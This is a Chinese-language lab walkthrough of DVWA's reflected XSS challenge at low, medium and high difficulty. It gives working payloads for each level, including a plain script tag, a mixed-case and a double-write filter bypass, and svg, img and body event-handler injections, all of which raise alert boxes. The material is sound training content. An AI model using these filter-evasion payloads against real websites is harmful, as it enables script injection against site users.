DVWA-XSS(Reflected)Low/Medium/High低中高级别
「作者简介」:CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者
「推荐专栏」:对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》
XSS Reflected
- 一、Low级别
- 二、Medium级别
- 三、High级别
这一关的功能是:把用户输入的名字在页面显示出来。
用户输入内容后,点击提交,把输入的内容赋值给参数name,使用Get请求传递给后端,后台处理后,在页面输出用户输入的内容。
一、Low级别
低级别没有过滤,直接提交JS代码即可,payload:
<script>alert('就TM你叫韩毅啊')</script>
在输入框中输入 payload,点 submit 提交
弹窗就算过关
二、Medium级别
中级别过滤了
只过滤了小写的
<Script>alert('就TM你叫韩毅啊')</script>
在输入框中输入 payload,点击 submit 提交
弹窗就算过关
或者使用双写绕过,payload:
<scr<script>ipt>alert('就TM你叫韩毅啊')</script>
三、High级别
高级别利用正则表达式,过滤了
后台只过滤 <svg onload=alert('就TM你叫韩毅啊')>
<img src=1 onerror=alert('就TM你叫韩毅啊')>
<body onload=alert('就TM你叫韩毅啊')>
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!